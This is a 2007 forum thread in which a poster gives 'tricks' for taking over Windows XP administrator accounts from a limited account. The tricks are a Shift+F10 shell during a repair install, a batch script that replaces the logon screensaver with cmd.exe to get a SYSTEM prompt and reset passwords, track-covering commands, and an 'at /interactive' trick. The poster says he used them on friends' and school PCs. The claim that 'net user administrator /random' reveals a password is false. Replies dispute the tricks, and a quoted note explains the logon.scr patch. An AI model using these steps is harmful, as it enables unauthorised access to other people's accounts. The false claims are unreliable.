TechTalkz.com Logo

Go Back   TechTalkz.com Technology & Computer Troubleshooting Forums > Tech World > TIPS 'n' TRICKS

Closed Thread
 
Thread Tools Display Modes
Old 08-11-2007, 12:53 AM   #1
Senior Member (500+)
 
The Chosen One's Avatar
 
Join Date: Jan 2007
Location: Tunisia
Age: 18
Posts: 831
Thanks: 39
Thanked 46 Times in 43 Posts
Rep Power: 20 The Chosen One has much to be proud ofThe Chosen One has much to be proud ofThe Chosen One has much to be proud ofThe Chosen One has much to be proud ofThe Chosen One has much to be proud ofThe Chosen One has much to be proud ofThe Chosen One has much to be proud ofThe Chosen One has much to be proud of
Send a message via MSN to The Chosen One Send a message via Yahoo to The Chosen One
Cool get your admin password in xp if u have a limited account

TRICK 1

HOW TO KNOW THE PASSWORD OF AN OTHER ADMIN??
1-start->run->cmd
2-write
Code:
net user administrator /random
3-u get the pass

TRICK 2

HOW TO MANAGE ALL ACCOUNTS EVEN ADMIN ONES FROM LIMITED USERS???

1-put XP cd in the CD drive...

2-restart the computer...

3-a "Press any key to boot" message will appear quickly press any key

4-an "inspectin your system and loading files" message appear then comes a "Welcome to setup" screen press Enter...

5-Licensing Agreement comes next ...press F8

6-then choose repair option,by pressing R on your xp OS, and let it load and copy files

7-now after 100% complete u will c “Your computer will reboot in 15 seconds”....let it reboot..
NOTE: after reboot DO NOT press any key when it asks "Press any key to boot" again

8-when a "Installing Devices" message appear under the progress bar... press Shift+F10....tht's a hole...just like the logon one.....a command prompt window will appear with a full admin power

9-type in there "NUSRMGR.CPL" and tht's it...now u can manage all accounts...like changing passwords.... delete passwords...

10-now pick the user u wont to change it's password....type "control userpasswords2" for a blank password ... meaning no password>>>>> password deleted

11-let the repair finish...

NOTE: this will NOT cause any loose of data..... only loose of password sure ,and will not affect ur installed programs.....

enjoy.....

TRICK 3

HOW TO CHANGE AN ADMIN PASSWORD FROM LIMITED ACCOUNTS??

1-go to start-->run then type "cmd" and press enter..

2-write the following code:
Code:
cd\
cd\windows\system32
mkdir temphack
copy logon.scr temphack\logon.scr
copy cmd.exe temphack\cmd.exe
del logon.scr
ren cmd.exe logon.scr
exit
u can make a batch file too!!!!

3-wait for screen saver to show....then an unprotected command prompt will appear >>> meanning u have full power
write
Code:
net user <admin account name> newpassword
by changing the admin account name by the account name and newpassword by the password u wish....

4-after al done cover ur tracks by doing writing this code in command prompt
Code:
cd c:\windows\system32
ren logon.scr cmd.exe
copy backup\logon.scr .
del backup\*
rd backup
</admin>
NOTE: this is not 100% working!!!!! cuz it is patched nowadays
follow this to make it work if it is not..

Quote:
The LOGON.SCR trick does not work w/ current (all?) WXP installations on several fronts.

1) If you can replace logon.scr with cmd.exe, “Windows File Protection” (WFP) will undo it. So you’d have to be able to disable that first OR change the registry value for SCRNSAVE.EXE in [HKEY_USERS\S-1-5-18\Control Panel\Desktop] from logon.scr to cmd.exe

2) Assuming you get cmd.exe in as the screen saver for SYSTEM and wait the 10 +/- minutes, a CMD box will pop up as noted under the user SYSTEM.

3) You try to do a NET USER Administrator and you get “System error 5 has occurred. Access is denied” — how can this be? Isn’t SYSTEM all powerful?

4) SYSTEM is all powerful but Microsoft fixed this back door by removing almost all of SYSTEM’s privs. Running a “whoami /user /groups /priv” for a normal SYSTEM session (AT hh:mm /INTERACTIVE cmd) gives:

[User] = “NT AUTHORITY\SYSTEM”

[Group 1] = “BUILTIN\Administrators”
[Group 2] = “Everyone”
[Group 3] = “NT AUTHORITY\Authenticated Users”

(X) SeTcbPrivilege = Act as part of the operating system
(O) SeCreateTokenPrivilege = Create a token object
(O) SeTakeOwnershipPrivilege = Take ownership of files or other objects
(X) SeCreatePagefilePrivilege = Create a pagefile
(X) SeLockMemoryPrivilege = Lock pages in memory
(O) SeAssignPrimaryTokenPrivilege = Replace a process level token
(O) SeIncreaseQuotaPrivilege = Adjust memory quotas for a process
(X) SeIncreaseBasePriorityPrivilege = Increase scheduling priority
(X) SeCreatePermanentPrivilege = Create permanent shared objects
(X) SeDebugPrivilege = Debug programs
(X) SeAuditPrivilege = Generate security audits
(O) SeSecurityPrivilege = Manage auditing and security log
(O) SeSystemEnvironmentPrivilege = Modify firmware environment values
(X) SeChangeNotifyPrivilege = Bypass traverse checking
(O) SeBackupPrivilege = Back up files and directories
(O) SeRestorePrivilege = Restore files and directories
(O) SeShutdownPrivilege = Shut down the system
(X) SeLoadDriverPrivilege = Load and unload device drivers
(X) SeProfileSingleProcessPrivilege = Profile single process
(X) SeSystemtimePrivilege = Change the system time
(X) SeUndockPrivilege = Remove computer from docking station
(O) SeManageVolumePrivilege = Perform volume maintenance tasks
(X) SeImpersonatePrivilege = Impersonate a client after authentication
(X) SeCreateGlobalPrivilege = Create global objects

But running the same command from the LOGON.SCR replacement instance of CMD.EXE gives:

[User] = “NT AUTHORITY\SYSTEM”

[Group 1] = “BUILTIN\Administrators”
[Group 2] = “Everyone”
[Group 3] = “NT AUTHORITY\Authenticated Users”

(X) SeChangeNotifyPrivilege = Bypass traverse checking

That’s why this doesn’t work.

Rick Valstar
Star Consulting
r + last name + at + gmail + dot + com
nx Says:
8 August 2007 at 11:14 pm.

1. press “start”
2. run cmd
3. run at HH:MM /interactive “cmd.exe” (time HH:MM+1M)
4. press CTRL+ALT+DEL and disable explorer.exe (end process)
5.in new black window run explorer

After these commands starts SYSTEM account and make your new admin acount
SOURCE

ENJOY DNT FORGET TO THNK ME
__________________
*DISCLAIMER*
Everything I post is an order from a little guy in my head.I DONT take the responsability of what he does or says.The name of the little guy is Perfect Hacker
MY blog

Last edited by The Chosen One; 29-02-2008 at 02:29 AM.
The Chosen One is offline  
Thanked Users:
Wolfie276 (29-02-2008)
Old 08-11-2007, 01:26 AM   #2
ƒ(ψ)=Θº×φ
 
bakuryu's Avatar
 
Join Date: May 2006
Location: India
Age: 22
Posts: 5,032
Thanks: 12
Thanked 393 Times in 363 Posts
Rep Power: 69 bakuryu has a brilliant futurebakuryu has a brilliant futurebakuryu has a brilliant futurebakuryu has a brilliant futurebakuryu has a brilliant futurebakuryu has a brilliant futurebakuryu has a brilliant futurebakuryu has a brilliant futurebakuryu has a brilliant futurebakuryu has a brilliant futurebakuryu has a brilliant future
Send a message via Yahoo to bakuryu
Re: get your admin password in xp if u have a limited account

for limited accounts it is disabled.

this is helpful if one administrator ones to know the password of other.
__________________
Please don't click here
bakuryu is offline  
Old 21-11-2007, 12:15 PM   #3
Newbie
 
an1234dy's Avatar
 
Join Date: Sep 2007
Age: 21
Posts: 15
Thanks: 0
Thanked 0 Times in 0 Posts
Rep Power: 0 an1234dy can only hope to improve
Re: get your admin password in xp if u have a limited account

It is not working.....because after typing of net administrator/random pressing enter, gives a message on my computer like that,
"The syntax of the command is
net [profile-id][session-id][session][hardware].......[][]."
That means I have to provide,such & such infos along with this command,& I see that the no. of such fields of info. is about 12-14.Even "set" command can not provide all such informations.There it needs something more.
SO,how can I get all those informations...to activate this command?
However,the os is XP2006.
__________________
Hi I am Anirban,21 yrs.age,Indian
an1234dy is offline  
Old 21-11-2007, 04:12 PM   #4
Senior Member (500+)
 
The Chosen One's Avatar
 
Join Date: Jan 2007
Location: Tunisia
Age: 18
Posts: 831
Thanks: 39
Thanked 46 Times in 43 Posts
Rep Power: 20 The Chosen One has much to be proud ofThe Chosen One has much to be proud ofThe Chosen One has much to be proud ofThe Chosen One has much to be proud ofThe Chosen One has much to be proud ofThe Chosen One has much to be proud ofThe Chosen One has much to be proud ofThe Chosen One has much to be proud of
Send a message via MSN to The Chosen One Send a message via Yahoo to The Chosen One
Re: get your admin password in xp if u have a limited account

wht???! it's working fine, with me i do not have a password so it is represented by * tht's all, tried it on many freinds pc's even the school ones working fine, and there is no xp 2006, the lastest one was on 2002. wht i know tht this is working on xp.
The Chosen One is offline  
Old 22-11-2007, 02:18 PM   #5
Newbie
 
an1234dy's Avatar
 
Join Date: Sep 2007
Age: 21
Posts: 15
Thanks: 0
Thanked 0 Times in 0 Posts
Rep Power: 0 an1234dy can only hope to improve
Red face Re: get your admin password in xp if u have a limited account

Quote:
Originally Posted by perfect hacker View Post
wht???! it's working fine, with me i do not have a password so it is represented by * tht's all, tried it on many freinds pc's even the school ones working fine, and there is no xp 2006, the lastest one was on 2002. wht i know tht this is working on xp.
No man,it is not u first time!In another thread,bakuryu,also said that,there is no xp2006,but that's not true.Because,when,I install that xp in my machine,after job is done,the default desktop shows "Windows 2006"<Advanced security & drivers>.Now,is it a fake windows?Not that,
it is working fine.It is xp.My assembler also said that, it is the version of xp,just prior to VISTA.Also,the default desktop background says that.And,that's why,may be,ur command is not working.It requires something more...!!!!!!!!!!!!
__________________
Hi I am Anirban,21 yrs.age,Indian
an1234dy is offline  
Old 22-11-2007, 05:06 PM   #6
ƒ(ψ)=Θº×φ
 
bakuryu's Avatar
 
Join Date: May 2006
Location: India
Age: 22
Posts: 5,032
Thanks: 12
Thanked 393 Times in 363 Posts
Rep Power: 69 bakuryu has a brilliant futurebakuryu has a brilliant futurebakuryu has a brilliant futurebakuryu has a brilliant futurebakuryu has a brilliant futurebakuryu has a brilliant futurebakuryu has a brilliant futurebakuryu has a brilliant futurebakuryu has a brilliant futurebakuryu has a brilliant futurebakuryu has a brilliant future
Send a message via Yahoo to bakuryu
Re: get your admin password in xp if u have a limited account

Quote:
No man,it is not u first time!In another thread,bakuryu,also said that,there is no xp2006,but that's not true.Because,when,I install that xp in my machine,after job is done,the default desktop shows "Windows 2006"<Advanced security & drivers>.Now,is it a fake windows?Not that,
it is working fine.It is xp.My assembler also said that, it is the version of xp,just prior to VISTA.
There is nothing like that. can your provide us a screenshot of what you are telling.

Also provide a screenshot of Control panel -> System
bakuryu is offline  
Old 24-11-2007, 04:20 PM   #7
Senior Member (500+)
 
The Chosen One's Avatar
 
Join Date: Jan 2007
Location: Tunisia
Age: 18
Posts: 831
Thanks: 39
Thanked 46 Times in 43 Posts
Rep Power: 20 The Chosen One has much to be proud ofThe Chosen One has much to be proud ofThe Chosen One has much to be proud ofThe Chosen One has much to be proud ofThe Chosen One has much to be proud ofThe Chosen One has much to be proud ofThe Chosen One has much to be proud ofThe Chosen One has much to be proud of
Send a message via MSN to The Chosen One Send a message via Yahoo to The Chosen One
Re: get your admin password in xp if u have a limited account

yeah right i could make a windows xp 2845.....
The Chosen One is offline  
Old 27-11-2007, 12:08 PM   #8
Newbie
 
justsanjeev's Avatar
 
Join Date: Jan 2007
Age: 24
Posts: 7
Thanks: 0
Thanked 0 Times in 0 Posts
Rep Power: 0 justsanjeev is an unknown quantity at this point
Re: get your admin password in xp if u have a limited account

very good Buddyy
Keep it UP !
justsanjeev is offline  
Old 28-11-2007, 04:00 PM   #9
Support Staff
 
Gigacore's Avatar
 
Join Date: Sep 2007
Location: Bangalore, India
Age: 19
Posts: 102
Thanks: 1
Thanked 8 Times in 7 Posts
Rep Power: 5 Gigacore is just really niceGigacore is just really niceGigacore is just really niceGigacore is just really nice
Send a message via MSN to Gigacore Send a message via Yahoo to Gigacore
Re: get your admin password in xp if u have a limited account

thanks hacker
Gigacore is offline  
Old 10-12-2007, 02:52 PM   #10
Newbie
 
an1234dy's Avatar
 
Join Date: Sep 2007
Age: 21
Posts: 15
Thanks: 0
Thanked 0 Times in 0 Posts
Rep Power: 0 an1234dy can only hope to improve
Re: Get your admin password in xp if u have a limited account

No,really it don't work on my pc.Now,is it only I have to type "net user administrator \random"?
Or,is there some thing else...because still in snother pc ..I got the same message/
"The syntax of the command is
net [Accounts|Profile-name|Profile-id|Continue|................]"
bakuryu,do I have to provide these...?because,if I simply type "net user......"then enter on cmd after"C:> ",every time it produces the same message.However,is there any way to recover my password.using boot linux...?If true,suggest,the complete way out.
__________________
Hi I am Anirban,21 yrs.age,Indian
an1234dy is offline  
Closed Thread

Thread Tools
Display Modes


Google
 


All times are GMT +5.5. The time now is 06:48 AM.


vBulletin, Copyright ©2000 - 2008, Jelsoft Enterprises Ltd.
Content Relevant URLs by vBSEO
Copyright © 2005-2008, TechTalkz.com. All Rights Reserved - Privacy Policy
Valid XHTML 1.0 Transitional